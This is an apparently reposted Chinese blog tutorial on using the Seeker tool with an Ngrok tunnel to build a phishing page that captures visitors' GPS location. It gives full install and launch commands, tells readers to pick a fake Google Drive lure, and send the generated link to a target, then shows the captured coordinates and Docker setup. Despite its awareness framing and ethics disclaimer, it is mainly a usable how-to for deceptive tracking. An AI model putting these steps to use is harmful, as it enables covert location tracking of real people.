1. 程式人生 > 其它 >通過釣魚網頁獲取訪問者GPS定位

通過釣魚網頁獲取訪問者GPS定位


通過釣魚網頁獲取GPS定位 --Seeker

在網際網路的世界裡,最不缺少的就是資訊,最容易獲取的也是資訊,在這個資訊互動的時代裡,你真能獨善其身?沒錯,你的安全只是相對的,而漏洞的存在則是絕對的!!!

Seeker -- WEB嗅探器


它可以幫你獲取來訪者的GPS位置資訊

本文章記錄一個釣魚網站的搭建和測試,旨在讓大家明白當我們瀏覽網頁時你個人資訊的一些流向。從而提高大家網路安全意識,讓壞人沒有可乘之機。科學技術是把雙刃劍,因此,在個人技術得到提高後請善待他人,永遠不要突破道德的底線!!! 下面讓我們進入正題。

大體思路:

通過Seeker在本機架設Web服務專案,然後用Ngrok開闢外網訪問隧道(內網穿透),當外網訪問時,Seeker即可探測到訪問者的一些資訊。

一、Seeker的安裝

專案地址:
https://github.com/thewhiteh4t/seeker.git

# 開啟命令列輸入
$ git clone https://github.com/thewhiteh4t/seeker.git
$ cd seeker/
$ apt update
$ apt install python3 python3-pip php
$ pip3 install requests
$ chmod +x install.sh

二、下載安裝Ngrok

1. 註冊Ngrok賬號

網站地址
https://ngrok.com/

2. 根據電腦型號下載對應的安裝包


解壓下載好的安裝包

$ unzip /path/to/ngrok.zip

3. 配置Ngrok

#開啟終端輸入
./ngrok authtoken + 祕鑰

三、開始搭建

1. cd開啟到Seeker專案下啟動Seeker

$ cd seeker/
$ python3 seeker.py -t manual #啟動專案

2. 輸入1選中Google Drive

回車後輸入任意一個URL

至此Seeker啟動完成

3. 啟動Ngrok

cd開啟到Ngrok專案下啟動ngrok

$ ngrok http 8080 #埠號要與Seeker監聽的埠號一致


紅色框框內隨機生成的連結就是釣魚連結,可將它發給目標使用者訪問。

四、測試

1. 開啟釣魚連結

ngrok頁面內的HTTP Requests會有響應

此時客戶端的頁面如下

當用戶點選Request access時會彈出

此時如果點選允許位置資訊就會暴露
此時Seeker端的畫面為

圖中紅框部分為目標經緯度

五、最後貼上Seeker原專案說明,不懂的地方可以查。

python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
  -h, --help            show this help message and exit
  -k KML, --kml         Provide KML Filename ( Optional )
  -p PORT, --port       Port for Web Server [ Default : 8080 ]
  -t TUNNEL, --tunnel   Specify Tunnel Mode [ Available : manual ]

##################
# Usage Examples #
##################

# Step 1 : In first terminal
$ python3 seeker.py -t manual

# Step 2 : In second terminal start a tunnel service such as ngrok
$ ./ngrok http 8080

###########
# Options #
###########

# Ouput KML File for Google Earth
$ python3 seeker.py -t manual -k <filename>

# Use Custom Port
$ python3 seeker.py -t manual -p 1337
$ ./ngrok http 1337

################
# Docker Usage #
################

# Step 1
$ docker network create ngroknet

# Step 2
$ docker run --rm -it --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual

# Step 3
$ docker run --rm -it --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080